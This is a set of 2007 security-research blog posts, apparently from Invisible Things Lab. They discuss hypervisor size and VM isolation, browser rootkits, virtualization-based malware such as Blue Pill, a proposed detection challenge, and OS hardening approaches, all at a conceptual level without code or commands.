Thursday, October 25, 2007

Razor-Thin Hypervisors

I just came back from Stockholm where I attended the Virtualization Forum, and saw several, quite interesting vendor presentations. One that caught my attention was a talk by VMware, and especially the part that talked about the new ESX 3i hypervisor and presented it as "razor-thin". This "razor-thin" hypervisor will have, according to VMWare, the footprint "of only 32MB".

My regular readers might sense that I’m a bit ironic here. Well, 32MB of code is definitely not a "razor-thin" hypervisor in my opinion and it’s not even close to a thin hypervisor... But why am I so picky about it? Is it really that important?

Yes, I think so, because the bigger the hypervisor the more chances that there is a bug somewhere out there. And one of the reasons for using virtual machines is to provide isolation. Even if we use virtualization because of business reasons (server consolidation), still we want each VM to be properly isolated, to make sure that if an attackers "gets into" one VM, she will not be able to 0wn all the other VMs on the same hardware… In other words, isolation of VMs, is an extremely important feature.

During my presentation I also talked about thin hypervisors. I first referenced a few bugs that were found in various VMMs in the recent months by other researchers (congrats to Rafal Wojtczuk of McAfee for some interestingly looking bugs in VMWare and Microsoft products). I used them as an argument that we should move towards very thin hypervisor architecture, exploiting hardware virtualization extension as much as possible (e.g. Nested Paging/EPT, IOMMU/DEV/NoDMA, etc) and avoiding doing things "in software".

Nobody should be really surprised seeing VMMs bugs – after all we have seen so many bugs in OS kernels over years, so no surprise we will see more and more bugs in VMMs, unless we switch to very thin hypervisors, so thin that it would be possible to understand and verify their code by one person. Only then we would be able to talk about security advantage (in terms of isolation) offered by VMMs comparing to traditional OSes.

I couldn’t refrain myself from mentioning that the existence of those bugs in popular VMMs clearly shows that having a VMM already installed doesn’t currently prevent from the "Blue Pill threat" – a point often expressed by some virtualization vendors, who notoriously try to diminish the importance of this problem (i.e. the problem of virtualization based malware).

I also announced that Invisible Things Lab has just started working with Phoenix Technologies. Phoenix is the world leader in system firmware, particularly known for providing BIOSes for PCs for almost 25 years, and currently is working on a new product called HyperCore that would be a very thin and lightweight hypervisor for consumer systems. ITL will be helping Phoenix to ensure the security of this product.

HyperCore hypervisor will use all the latest hardware virtualization extensions, like e.g. Nested Paging/EPT to minimize the unnecessary complexity and to provide negligible performance impact. For the same reasons, the I/O access will go through almost natively, just like in case of our Blue Pill...

Speaking about Blue Pill – Phoenix is also interested in further research on Blue Pill, which will be used as a test bed for trying various ideas – e.g. nested virtualization, which might be adopted in the future versions of HyperCore to allow users to use other commercial VMMs inside their already-virtualized OSes. Blue Pill’s small size and minimal functionality makes it a convenient tool for experimenting. Phoenix will also support The Blue Pill Project which means that some parts of our research will be available for other researchers (including code)!

In case you still feel like having a look into my slides, you can get them here.

Wednesday, October 17, 2007

Thoughts On Browser Rootkits

Petko D. Petkov from GNUCITIZEN wrote a post about Browser Rootkits, which inspired me to give some more thoughts on this subject. Petko is an active researcher in the field of client-side exploits (e.g. recent Adobe Acrobat PDF flaw), so it’s not a surprise that he’s thinking about browsers as a natural environment for rootkits or malware. Also it’s quite common to hear an opinion these days that browsers become so complicated and so universal that they are almost like operating systems rather than just standard applications.

Petko in his post gives several ideas of how browser-based malware could be created and I’m sure that we will see more and more such malware in the near future (I would actually be surprised if it didn’t exist already). His main argument for creating “Browser Rootkits” is that they would be “closer to the data”, which is, of course, undisputable.

The other argument is the complexity of a typical browser like e.g. Firefox or Internet Explorer. It seems like we have a very similar situation here to what we have with "classic" operating systems like e.g. Windows. Windows is so complex that nobody (including Microsoft) can really spot all the sensitive places in the kernel where a rootkit might "hook" – thus it’s not possible to effectively monitor all those places. We have a similar problem with Firefox and IE because of their extensible architecture (think about all those plugins, add-ons, etc) – although we could examine the whole memory of firefox.exe process, we still would not be able to decide whether something bad is there or not.

I’m even quite sure that my little malware taxonomy could be used here to classify Firefox or IE infections. E.g. the browser malware of type 0, would be nothing else then just additional plugins, installed using official API and not trying to hide from browser reporting mechanisms (in other words they still will be visible to users when they will ask the browser to list all the installed plugins). And we will have type I and type II infections, the former would be simply modifying some code (be that a code of a browser or maybe of some other plugin) while the latter would be hooking some function pointers or changing some data only – this all to hide the offensive module.

BTW, there is a little problem with classifying JIT-generated code – should it be type I or type II infection? I don’t know the answer for now and I welcome all the feedback on this. And we can even imagine type III infections of browsers, but I will leave it as an exercise for my readers :)

So, should we expect the classic, OS-based rootkits to die and the efforts in the malware community to move towards creating Browser-based rootkits? I don’t think so. While the browser-based malware is and will definitely be more and more important problem, it has one disadvantage comparing to classic OS-based malware. Namely it’s quite easy to avoid, or at least minimize the impact from browser-based rootkits. It’s just enough to use two different browsers – one for sensitive and the other one for non-sensitive operations.

So, for example, I use IE to do all my sensitive browsing (e.g. online banking, blogger access, etc), while Firefox to do all the casual browsing, which includes morning press reading, google searching, etc. The reason I use Firefox for non-sensitive browsing doesn’t come from the fact that I think it’s more secure (or better written) then IE, but because I like using NoScript and there is no similar plugin for IE...

Of course, an attacker still might exploit my non-sensitive browser (Firefox) and then modify configuration or executable files that are being used by my sensitive browser (IE). However this would require write-access to those files. This is yet another reason why one should run the non-sensitive browser with limited privileges and technologies like UAC in Vista help to achieve it. I wrote an article some time ago about how one can configure Vista to implement almost-full privilege separation.

Of course, even if we decide to use 2 different browsers - one for sensitive and the other one for non-sensitive browsing, an attacker still might be able to break out from account protection via a kernel mode exploit (e.g. exploiting one of the bug that Alex and I presented in Vegas this year). However this would not be a browser malware anymore – this would be a good old kernel-mode malware :)

A solution to this problem will probably be the use of a Virtual Machine to run the non-sensitive browser. Even today one might download e.g. the Browser Appliance from VMWare and we will see more and more solutions like this in the coming years I think. This BTW, will probably stimulate more research into VM escaping and virtualization-based malware.

Of course, the very important and sometimes non-trivial question is how to decide which type of browsing is sensitive and which is non-sensitive. E.g. most people will agree the online banking is a sensitive browsing, but what about webmail? Should I use my sensitive or non-sensitive browser for accessing my mail via web? Using a sensitive browser for webmail is dangerous, as it’s quite possible that it could be infected via some malicious mail that would be in our inbox. While using the non-sensitive browser for webmail is also not a good solution, as most people would like to consider mail as sensitive and would not like to allow the possibly-compromised browser to learn the password for the mailbox.

I avoid this problem by not using a browser for webmail and by having a special account just for running a thunderbird application (see again my article on how to do this in Vista). It works well for me.

Of course, one could also do the same for browser – i.e. instead of having 2 browsers (i.e. sensitive and non-sensitive), one could have 3 or more (maybe even 3 different virtual machines). But the question is how many accounts should we use? One for email, one for sensitive browsing, one for non-sensitive, one for accessing personal data (e.g. pictures)...? I guess there is no good answer for this and it depends on the specific situation (i.e. different configuration for home user that uses computer mostly for "fun" and different for somebody using the same computer for both work and "fun", etc...)

On a side note – I really don’t like the idea of using a web browser to do "everything" – I like using browser to do browsing, while to do other things to use specialized applications. I like having my data on my local hard drive. It’s quite amazing that so many people these days use Google not only for searching, but also for email, calendaring and documents editing – it’s like giving all your life secretes on a plate! Google can now correlate all your web search queries with a specific email account and even see who are you meeting with next evening and also know what a new product your company will be presenting next week, as you prepared you presentation using Google Documents. I’m not sure whether it’s Google or the people’s naivety that disturbs me more...

Friday, August 31, 2007

Tricky Tricks

I want to make a short philosophical comment about how some approaches to building security are wrong.

Let’s move back in time to the last decade of the XX century, to the 90’s... Back in those days one of the most annoying problems in computer security was viruses, or, more precisely, executable file infectors. Many smart guys were working on both sides to create more stealthy infectors and also better detectors for those infectors…

Russian virus write Z0mbie with his Mistfall engine and Zmist virus went probably closest to the Holy Grail in this arm race – the creation of an undetectable virus. Peter Szor, a Symantec’s chief antivirus researcher, wrote about his work in 2001:

Many of us will not have seen a virus approaching this complexity for a few years. We could easily call Zmist one of the most complex binary viruses ever written.

But nothing is really undetectable if you have a sample of the malware in your lab and can spent XXX hours analyzing it – you will always come up with some tricks to detect it sooner or later. The question is – were any of the A/V scanners back then ready to detect such an infection if it was a 0day in the wild? Will any of the today’s scanners detect a modified/improved Zmist virus, or would they have to count on the virus author being nice enough to send them a sample for an analysis first?

Interestingly, file infectors stopped being a serious problem a few years ago. But this didn’t happen because the A/V industry discovered a miracle cure for viruses, but rather because the users’ habits changed. People do not exchange executables that often as 10 years ago. Today people rather download an executable from the Web (legal or not) rather then copy it from a friend’s computer.

But could the industry have solved the problem of file infectors in an elegant, definite way? The answer is yes and we all know the solution – digital signatures for executable files. Right now, most of the executables (but unfortunately still not all) on the laptop I’m writing this text on are digitally signed. This includes programs from Microsoft, Adobe, Mozilla and even some open source ones like e.g. True Crypt.

With digital signatures we can "detect" any kind of executable modifications, starting form the simplest and ending with those most complex, metamorphic EPO infectors as presented e.g. by Z0mbie. All we need to do (or more precisely the OS needs to do) is to verify the signature of an executable before executing it.

I hear all the counter arguments: that many programs out there are still not digitally signed, that users are too stupid to decide which certificates to trust, that sometimes the bad guys might be able to obtain a legitimate certificate, etc...

But all those minor problems can be solved and probably will eventually be solved in the coming years. Moreover, solving all those problems will probably cost much less then all the research on file infectors cost over the last 20 year. But that also means no money for the A/V vendors.

Does it mean we get a secure OS this way? Of course not! Digital signatures do not protect against malicious code execution, e.g. they can't stop an exploit from executing its shellcode. So why bother? Because certificates allow to verify that what we have is really what we should have (e.g. that nobody infected any of our executable files). It’s the first step in ensuring integrity of an OS.

The case of digital signatures vs. file infectors is a good example of how problems in security should be addressed. But we all know that the A/V industry took a different approach – they invested zillions of dollars into research on polymorphic virus detection, built advanced emulators for analysis of infected files, etc. The outcome – lots of complex heuristics that usually work quite well against known patterns of infection, but are often useless against new 0day engines and also are so complex that nobody really knows how many false positives they can produce and how buggy the code itself is. Tricks! Very complex and maybe even interesting (from a scientific point of view) tricks.

So, do I want to say that all those years of A/V research on detecting file infections was a waste time? I’m afraid that is exactly what I want to say here. This is an example of how the security industry took a wrong path, the path that never could lead to an effective and elegant solution. This is an example of how people decided to employ tricks, instead looking for generic, simple and robust solutions.

Security should not be built on tricks and hacks! Security should be built on simple and robust solutions. Oh, and we should always assume that the users are not stupid – building solutions to protect uneducated users will always fail.

Friday, August 03, 2007

Virtualization Detection vs. Blue Pill Detection

So, it’s all over the press now, but, as usual, many people didn’t quite get the main points of our Black Hat talk. So, let’s clear things up... First, please note that the talk was divided into two separate, independent, parts – the first one about bypassing vista kernel protection and the second one about virtualization based malware.

The message of the first part was that we don’t believe it’s possible to implement effective kernel protection on any general purpose OS based on monolithic kernel design.

The second part, the one about virtualization, had several messages...
  1. The main point was that detecting virtualization is not the same as detecting virtualization based malware. As hardware virtualization technology gets more and more widespread, many machines will be running with virtualization mode enabled, no matter whether blue pilled or not. In that case blue pill-like malware doesn’t need to cheat that virtualization is not enabled, as it’s actually expected that virtualization is being used for some legitimate purposes. In that case using a "blue pill detector", that in fact is just a generic virtualization detector is completely pointless.

    Obviously in such scenarios blue pill-like malware must support nested hypervisors. And this is what we have implemented in our New Blue Pill. We can run tens of blue pills inside each other and they all work! You can try it by yourself, but you should disable comport debug output to do more then twenty nested pills. We still fail at running Virtual PC 2007 as a nested hypervisor (when it’s guest switches to protected mode), but we hope to have this fixed in the coming weeks (please note that VPC’s hypervisor doesn’t block blue pill from loading – see our slides for more info).

    In other words, if somebody announces to the world that they can fight virtualization based malware using generic virtualization detectors, it’s like if they said that they can detect e.g. a botnet agent, just by detecting that an executable is using networking!

  2. We have also decided to discuss how blue pill could potentially cheat those generic virtualization detectors, even though we don’t believe it would be necessary in the coming years, as everything will be virtualized anyways (see previous point). But, we still decided to look into some of the SVM detection methods. First, we found out that many methods that people described as a way to detect virtualization do not work in the simple form as they were described. We took a closer look e.g. at the TLB profiling methods that were suggested by several researchers as a reliable method for virtualization detection. However all the papers that were describing this method missed the fact that some of the caches are not fully associative and one needs to use special effort (which means additional complexity) to make sure to e.g. fill the whole TLB L2 buffer. Obviously we provided all the necessary details of how to write those detectors properly (we even posted one such detector).

    In other words - we believe that it will always be possible to detect virtualization mode using various tricks and hacks, but: 1) those hacks could be forced to be very complex and 2) in case virtualization is being used on the target computer for some legitimate purposes all those methods fail anyway (see point 1).

  3. Some people might argue that maybe then we should build these virtualization detectors into all the legitimate hypervisors (e.g. Virtual PC hypervisor), so that they know at least whether they are being run on a native machine or maybe inside blue pill. However this approach contradicts the rules we use to build secure and effective hypervisors. These rules say that hypervisors should be as small as possible and there should be no 3rd party code allowed there.

    Now imagine that A/V company try to insert their virtualization detectors (which BTW would have to be updated from time to time to support e.g. new processor models) into hypervisors – if that ever happened, it would be a failure of our industry. We need other methods to address this threat, methods that would be based on documented, robust and simple methods. Security should not be built on bugs, hacks and tricks!

We posted the full source code of out New Blue Pill here. We believe that it will help other researchers to to analyze this threat and hopefully we will find a good solution soon, before this ever become widespread.

Happy bluepilling!

On a side note: now I can also explain (if this is not clear already) how we were planning to beat our challengers. We would simply ask them to install Virtual Server 2005 R2 on all the test machines and we would install our New Blue Pill on just a few of them. Then their wonderful detectors would simply detect that all the machines have SVM mode enabled, but that would be a completely useless information. Yes, we still believe we would need a couple of months to get our proof-of-concept to the level we would be confident that we will win anyway (e.g. if they used memory scanning for some “signature).

BTW, you might be wondering why I introduced the “no CPU peek for more then 1s” requirement? I will leave finding an answer as an exercise from a psychology to my dear readers ;)

Thursday, June 28, 2007

We're ready for the Ptacek's challenge!

Thomas Ptacek and company just came up with this funny challenge to test our Blue Pill rootkit. And, needles to say, the Invisible Things Lab team is ready to take their challenge, however with some additional requirements, that would assure the fairness of the contest.

First, we believe that 2 machines are definitely not enough, because the chance of correct guess, using a completely random (read: unreliable) detection method is 50%. Thus we think that the reasonable number is 5 machines. Each of them could be in a state 0 or 1 (i.e. infected or not). On each of this machines we install two files: bluepill.exe and bluepill.sys

The .sys file is digitally signed, so it loads without any problem (we could use one of our methods for loading unsigned code on vista that we're planning to demonstrate at BH, but this is not part of the challenge, so we will use the official way).

The bluepill.exe takes one argument which is 0 or 1. If it's 1 it loads the driver and infects the machines. If it's 0 it also loads the driver, but the driver does not infect the machine.

So, on each of the 5 machines we run bluepill.exe with randomly chosen argument, being 0 or 1. We make sure that at least one machine is not infected and that at least one machine is infected.

After that the detection team runs their detector.exe executable on each machine. This program can not take any arguments and must return only one value: 0 or 1. It must act autonomously -- no human assistance when interpreting the results.

The goal of the detection team is to correctly mark each machine as either being infected (1) or not (0). The chance of a blind guess is:

1/(2^5-2) = 3%

The detector can not cause system crash or halt the machine -- if it does they lose. The detector can not consume significant amount of CPU time (say > 90%) for more then, say 1 sec. If it does, then it's considered disturbing for the user and thus unpractical.

The source code of our rootkit as well as the detector should be provided to the judges at the beginning of the contests. The judges will compile the rootkit and the detector and will copy the resulting binaries to all test machines.

After the completion of the contest, regardless of who wins, the sources for both the rootkit and the detector will be published in the Internet -- for educational purpose to allow others to research this subject.

Our current Blue Pill has been in the development for only about 2 months (please note that we do not have rights to use the previous version developed for COSEINC) and it is more of a prototype, with primary use for our training in Vegas, rather then a "commercial grade rootkit". Obviously we will be discussing all the limitations of this prototype during our training. We believe that we would need about 6 months full-time work by 2 people to turn it into such a commercial grade creature that would win the contest described above. We're ready to do this, but we expect that somebody compensate us for the time spent on this work. We would expect an industry standard fee for this work, which we estimate to be $200 USD per hour per person.

If Thomas Ptacek and his colleges are so certain that they found a panacea for virtualization based malware, then I'm sure that they will be able to find sponsors willing to financially support this challenge.

As a side note, the description for our new talk for Black Hat Vegas has just been published yesterday.

Friday, May 18, 2007

Invisible Things Lab, Bitlocker/TPM bypassing and some conference thoughts

Invisible Things Lab’s website is now online! However, we still don’t have a cute logo because the company where I order the logo presented me with something completely unacceptable and disappointing after taking a week to prepare it :( Alex is really pissed of by this and I hope we will find something nice really soon...

Anyway, as you can see on the website, we don’t have any product and we focus on consulting and research-on-demand only. We mainly target three groups of customers:

First there are security vendors and OS vendors, to whom we offer our product assessment and advisory services. E.g. we can take a look at the design and implementation of a rootkit detector, host IPS or some custom hardened OS and point out all the weaknesses we see and also give advices what we think should be improved. We can advise about both the design and implementation side, sometimes without requiring all the product internal information being shared with us.

The other group is corporate customers interested in unbiased evaluation of security technology they're planning to deploy. Here we can look at the products they consider to deploy and point out pros and cons of each of them and suggest the best choice. So e.g. we can look at various “information leak protectors” and tell how sophisticated techniques are required to bypass each of them (because, of course, all such products are bypassable). We can also advise about various technical aspects of implementing corporate security policies.

Finally there are law enforcement customers and forensic investigators, whom we can help to stay up-to-date with current offensive technology as used e.g. by modern malware, by running various trainings and seminars. We can also share our experience with advanced stealth malware and covert channels to help investigate more sophisticated incidents.

Ok, so what we don’t do? Well, we do not do classic code auditing, understood as looking for implementation bugs like e.g. buffer overflows or race conditions. We still do implementation analysis, when e.g. assessing a product, but we look only at feature-specific parts of implementation – e.g. how the kernel protection or hooking has been implemented in a given host IDS.

We also don’t do web application security nor database security. There are people who have much more experience in this area then we have, so go to them!

Finally, we do not do penetration testing, simply because I don’t believe this is the best way of improving system security. I can run 101 exploits against your server and even though all of them fail, still it tells nothing about how secure is your system. Maybe there is some little detail I missed which caused all my exploits to fail just because I was tired that day? I would definately prefer to talk to the security team and also to the server admin and ask them what they have done to secure the server in the first place. If I though that their approach has some weakness then I would simply advise them what I think they should improve. Later I would kindly ask them to give me the root/admin access so that I could verify by myself whether the advices have been implemented... This approach has an advantage of being much more complete and usually taking much less time over the standard pen-testing. It has one disadvantage though – it’s not a good material for a Hollywood movie ;)

So, all in all, we focus on OS security in contrast to application security and network security (although we can be helpful with detecting covert channels in a corporate enviroment).

Speaking of OS security (and leaving the subject of my new company for a second) – I recently had a pleasure of giving a keynote speech at the NLUUG conference in the Netherlands, which this year was focused on virtualization technology. The conference was really nice (even though 2/3 of the talks were in Dutch) and there were couple of talks I liked in particular. First, there was a talk about Microhypervisor Verification by Hendrik Tews. Author presented the overview of the Nizza architecture (which was interesting, but in my opinion way too complicated and impractical for using it anywhere outside the lab). He also talked about challenges with formal verification of kernel and microkernel, which was very interesting. I talked to him later about feasibility of verifying the monolithic kernels, like those in Linux or Windows and, not surprisingly, he said it's not really possible these days and in the coming years, because of the cost (I need to mention that he does the verification "manually").

There was also a nice presentation about Kernel Virtual Machine Monitor (KVM) for Linux by one of its developer Avi Kivity. I think in the future it might be a strong competition to Xen, especially after they add support for IOMMU technology (which I think is expected to be introduced on AMD and Intel processors somewhere in 2008). I really like the design of KVM which takes advantage of many features already present in Linux kernel without implementing them from scratch.

Finally there was a presentation by another polish female researcher, Asia (Joanna) Slowinska. She talked about Prospector, a system built on top of a CPU emulator (based on Qemu) to automatically generate generic signatures for buffer overflow attacks (both heap and stack based). On a side note, Asia (which by the way is pronounced “Ashyia” and not like the continent!) is the short form of the name Joanna, so basically almost everybody in Poland calls me Asia as well ;)

There was also a talk by Anil Madhavapeddy of XenSource, but in my opinion it was a little bit too much of a “marketing” presentation rather then a technical one (even though Anil turned out as a very technical and knowledgeable guy).

I also had some meetings at the Vrije Universiteit in Amsterdam the following day, where I met with MINIX3 developers and prof. Andrew Tanenbaum (what a fool I was that I didn’t bring one of his famous books to get an autograph:/). I must say really like the design of MINIX3, which keeps all the drivers (and other system components) in usermode, in separated address spaces. This is, however, still problematic today, as without IOMMU we can’t really fully protect kernel from usermode drivers, because of the potential DMA attacks – i.e. a driver can setup a DMA write-transaction to overwrite some part of the micro kernel memory, thus owning the system completely. But I guess we will all have processors supporting IOMMU within the next 1-2 years.

Just two days ago I delivered another keynote presentation, this time at the InfoSecurity conference in Honk Kong, organized by Computer World. My speech was about “Human Factor vs. technology” and basically the message I tried to pass was that the technology is just as flawed as the so called “human factor”, understood here as an user’s unawareness and administrator’s incompetence. I guess this is something perfectly obvious for most of technical security people, who at least once wrote an exploit by themselves. But apparently not for the security management stuff... So, even though it was by far the least technical speech I have every gave in my life, it was received as way too technical for many attendees (who were like “OMG, that was a shock!”). And I didn’t even mention any specific research I’ve done – just some standard stuff about exploits etc...

I also took part in a discussion panel with several C-level executives, some of them being CIOs for some huge institutions, others being C-level marketing guys from several security vendors.

So, I must say I was really struck by the complete lack of understanding of even the basic technical concepts behind IT security shown by some of the management people who were there. I understand, of course, that typical CIO or CSO doesn’t need to know much about technical details about how exploits and malware work, but their naivety was really shocking!

Speaking of conferences, I own apologizes to the organizers of Confidence 2007 conference in Krakow, Poland. After spending several days in the Netherlands, experiencing their rainy weather and also because of the shortage of sleep in the recent weeks due to some traveling (especially lack of my afternoon naps), I got sick and couldn’t make it to the conference. I heard it was very good this year, featuring many international speakers and, of course, Krakow, which is one of the nicest cities in Poland.

Finally, I would like to explain a little confusion around our Black Hat training. Shortly after we announced the training, there appeared some press articles which incorrectly described the kernel attacks that we’re going to present in Vegas. In the original blog post I said that these attacks “work on the fly and do not require system reboot and are not afraid of the TPM/Bitlocker protection”, but some people understood that we were going to actually present ways to defeat Bitlocker Drive Encryption (BDE). This is quite a misunderstanding, because those attacks, which allow for inserting unsigned code into Vista x64 kernel, are “not afraid of TPM/Bitlocker” simply because they can be executed on the fly and thus do not require system reboot, while Bitlocker’s task is to secure the boot process, but not to prevent the kernel against compromises!

However I intentionally mentioned TPM and Bitlocker, just to stress that those technologies have simply nothing to do with stopping rootkits and kernel compromises, provided you’re using kernel attacks which do not require system reboot, even though they’re often advertised as if they had… So, basically, even if we could break the BDE, it still wouldn’t give us any benefit these days. The situation will change within 2-3 years or so, i.e. when Microsoft will eventually come up with their own hypervisor, but that’s a different story...

Friday, April 20, 2007

Understanding Stealth Malware



Ever wondered whether Blue Pill really works or was just a PR stunt? Ever wanted to see how practical are various timing attacks against it? (And can even those “unpractical” be cheated?) Or how many Blue Pills inside each other can you run and still be able to play your favorite 3D game smoothly? Or how deep Alex can hook into Windows NDIS to bypass your personal firewall? Do you want to see Patch Guard from a “bird’s eye view” perspective? Or do you simply want to find out how well the latest Vista x64 kernel is protected? Ever wondered how rootkits like Deepdoor and Firewalk really worked? You can’t sleep, because you’re thinking constantly about how Blue Pill-like malware can be prevented? Does Northbridge hacking sound sexy to you? :)

At the very end of July, during the Black Hat Briefings in Las Vegas, Alex Tereshkin and I will be running a training “Understanding Stealth Malware”, where you should be able to find answers to the above questions plus many more.

The training will feature many previously unpublished techniques, implementation details, and of course lots of brand new code, developed especially for the training. The code will include sample rootkits similar to Deepdoor, Firewalk, Blue Pill and Delusion (but redesigned and rewritten from scratch) as well as some more exotic things, like e.g. anti-hardware-forensic attacks.

As the training will be focused on Windows platform and Vista x64 specifically, we will also present some new kernel attacks against latest Vista x64 builds. These attacks, of course, work on the fly and do not require system reboot and are not afraid of the TPM/Bitlocker protection. (Although they could also be used to bypass Vista DRM protection, this subject will not be discussed during the training).

Attendees will mostly work with kernel debuggers in order to analyze and understand various techniques used in system compromises. The main goal of the training is to help students understand contemporary malware techniques, enable them to see the “bigger picture” over technical details and show possible approaches to compromise detection.

Thus the course is primarily targeted for developers of security products, forensic investigators, pen-testers and OS developers. It’s recommended that attendees have a basic knowledge of OS design and implementation (specifically Windows), C programming, at least basic experience with debugging and ability to understand fragments of assembler code (IA32 architecture).

For ethical reasons we want to limit the availability of this course to only "legitimate" companies, thus we require that you specify your official business email address and company's website when registering for the course.

Pre-configured workstations will be provided, so there is no need to prepare for the course in any specific way. You can find more information and register for the training on the blackhat website. Please note that there will be only 2 public classes of this training this year – both during the Black Hat Briefings (28/29 and 30/31 of July). More classes will be available only in the form of on-site trainings for corporate customers.

Please also note that the number of seats is hard-limited by the number of available workstations, so we encourage registering early.

As for the other news – I have just quit COSEINC last week and I’m in the process of establishing a new security consulting and research company. For now I can only betray the name: Invisible Things Lab - expect more details to be posted here in the coming weeks :)

Sunday, April 01, 2007

The Human Factor

When you go to some security conferences, especially those targeted for management staff, you might get the impression that the only problem in the security field that mankind is facing today is… that we’re too stupid and we do not know how to use the technology properly. So, we, use those silly simple passwords, allow strangers to look at our laptop screens over our shoulders, happily provide our e-bank credentials or credit card numbers to whoever asks for them, etc… Sure, that’s true indeed – many people (both administrators and users) do silly mistakes and this is very bad and, of course, they should be trained not to do them.

However, we also face another problem these days… A problem of no less importance then “the human factor”. Namely, even if we were perfectly trained to use the technology and understood it very well, we would still be defenseless in many areas. Just because the technology is flawed!

Think about all those exploitable bugs in WiFi drivers in your laptop or email clients vulnerabilities (e.g. in your GPG/PGP software). The point is, you, as a user can not do anything to prevent exploitation of such bugs. And, of course, the worst thing is, that you don’t even have any reliable way to tell whether somebody actually successfully attacked you or not – see my previous post. None of the so called “industry best practices” can help – you just need to hope that your system hasn’t been 0wned. And this is really disturbing…

Of course, you can chose to believe in all this risk assessment pseudo-science, which can tell you that your system is “non-compromised with 98% probability” or you can try to comfort yourself because you know that your competition has no better security they you… ;)

Monday, March 26, 2007

The Game Is Over!

People often say that once an attacker gets access to the kernel the game is over! That’s true indeed these days, and most of the research I have done over the past two years or so, was about proofing just that. Some people, however, go a bit further and say, that thus there is no point in researching ways to detect system compromises and, once an attacker got in, you should simply assume everything has been compromised and replace all the components, i.e. buy new machine (as the attacker might have modified the BIOS or re-flashed PCI EEPROMs), reinstall OS, all applications, etc.



However, they miss one little detail – how can they actually know that the attacker got access to the system and that the game is over indeed and we need to reinstall just now?

Well, we simply assume that the attacker had to make some mistake and that we, sooner or later, will find out. But what if she didn’t make a mistake?

There are several trends of how this problem should be addressed in a more general and elegant way though. Most of them are based on a proactive approach. Let’s have a quick look at them…
  1. One generic solution is to build in a prevention technology into the OS. That includes all the anti-exploitation mechanisms, like e.g. ASLR, Non Executable memory, Stack Guard/GS, and others, as well as some little design changes into OS, like e.g. implementation of least-privilege principle (think e.g. UAC in Vista) and some sort of kernel protection (e.g. securelevel in BSD, grsecurity on Linux, signed drivers in Vista, etc).

    This has been undoubtedly the most popular approach for the last couple of years and recently it gets even more popular, as Microsoft implemented most of those techniques in Vista.

    However, everybody who follows the security research for at least several years should know that all those clever mechanisms have all been bypassed at least once in their history. That includes attacks against Stack Guard protection presented back in 2000 by Bulba and Kil3r, several ways to bypass PaX ASLR, like those described by Nergal in 2001 and by others several months later as well as exploiting the privilege elevation bug in PaX discovered by its author in 2005. Also the Microsoft's Hardware DEP (AKA NX) has been demonstrated to be bypassable by skape and Skywing in 2005.

    Similarly, kernel protection mechanisms have also been bypassed over the past years, starting e.g. with this nice attack against grsecurity /dev/(k)mem protection presented by Guillaume Pelat in 2002. In 2006 Loic Duflot demonstrated that BSD's famous securelevel mechanism can also be bypassed. And, also last year, I showed that Vista x64 kernel protection is not foolproof either.

    The point is – all those hardening techniques are designed to make exploitation harder or to limit the damage after a successful exploitation, but not to be 100% foolproof. On the other hand, it must be said, that they probably represent the best prevention solutions available for us these days.

  2. Another approach is to dramatically redesign the whole OS in such a way that all components (like e.g. drivers and serves) are compartmentalized, e.g. run as separate processes in usermode, and consequently are isolated not only from each other but also from the OS kernel (micro kernel). The idea here is that the most critical components, i.e. the micro kernel, is very small and can be easily verified. Example of such OS is Minix3 which is still under development though.

    Undoubtedly this is a very good approach to minimize impact from system or driver faults, but does not protect us against malicious system compromises. After all if an attacker exploits a bug in a web browser, she may only be interested in modifying the browser’s code. Sure, she probably would not be able to get access to the micro kernel, but why would she really need it?

    Imagine, for example, the following common scenario: many online banking systems require users to use smart cards to sign all transaction requests (e.g. money transfers). This usually works by having a browser (more specifically an ActiveX control or Firefox’s plugin) to display a message to a user that he or she is about to make e.g. a wire transfer to a given account number for a given amount of money. If the user confirms that action, they should press an ‘Accept’ button, which instructs browser to send the message to the smart card for signing. The message itself is usually just some kind of formatted text message specifying the source and destination account numbers, amount of money, date and time stamp etc. Then the user is asked to insert the smart card, which contains his or her private key (issued by the bank) and to also enter the PIN code. The latter can be done either by using the same browser applet or, in slightly more secure implementations, by the smart card reader itself, if it has a pad for entering PINs.

    Obviously the point here is that malware should not be able to forge the digital signature and only the legitimate user has access to the smart card and also knows the card’s PIN, so nobody else will be able to sign that message with the user’s key.

    However, it’s just enough for the attacker to replace the message while it’s being send to the card, while displaying the original message in the browser’s window. This all can be done by just modifying (“hooking”) the browser’s in-memory code and/or data. No need for kernel malware, yet the system (the browser more specifically) is compromised!


    Still, one good thing about such a system design is that if we don’t allow an attacker to compromise the microkernel, then, at least in theory, we can write a detector capable of finding that some (malicious) changes to the browsers memory have been introduced indeed. However, in practice, we would have to know how exactly the browser’s memory should look like, e.g. which function pointers in Firefox’s code should be verified in order to find out whether such a compromise has indeed occurred. Unfortunately we can not do that today.

  3. Alternative approach to the above two, which does not require any dramatic changes into OS, is to make use of so called sound static code analyzers to verify all sensitive code in OS and applications. The soundness property assures that the analyzer has been mathematically proven not to miss even a single potential run time error, which includes e.g. unintentional execution flow modifications. The catch here is that soundness doesn’t mean that the analyzer doesn’t generate false positives. It’s actually mathematically proven that we can’t have such an ideal tool (i.e. with zero false positive rate), as the problem of analyzing all possible program execution paths is incomputable. Thus, the practical analyzers always consider some superset of all possible execution flows, which is easy to compute, yet may introduce some false alarms and the whole trick is how to choose that superset so that the number of false positives is minimal.

    ASTREE is an example of a sound static code analyzer for the C language (although it doesn’t support programs which make use of dynamic memory allocation) and it apparently has been used to verify the primary flight control software for Airbus A340 and A380. Unfortunately, there doesn’t seem to be any publicly available sound binary code static analyzers… (if anybody knows any links, you’re more then welcome to paste the links under this post – just please make sure you’re referring to sound analyzers).

    If we had such sound and precise (i.e. with minimal rate of false alarms) binary static code analyzer that could be a big breakthrough in the OS and application security.

    We could imagine, for example, a special authority for signing device drivers for various OSes and that they would first perform such a formal static validation on submitted drivers and, once passed the test, the drivers would be digitally signed. Plus, the OS kernel itself would be validated itself by the vendor and would accept only those drivers which were signed by the driver verification authority. The authority could be an OS vendor itself or a separate 3rd party organization. Additionally we could also require that the code of all security critical applications, like e.g. web browser be also signed by such an authority and set a special policy in our OS to allow e.g. only signed applications to access network.

    The only one week point here is, that if the private key used by the certification authority gets compromised, then the game is over and nobody really knows that… For this reason it would be good, to have more then one certification authority and require that each driver/application be signed by at least two independent authorities.

From the above three approaches only the last one can guarantee that our system will not get compromised ever. The only problem here is that… there are no tools today for static binary code analysis that would be proved to be sound and also precise enough to be used in practice…

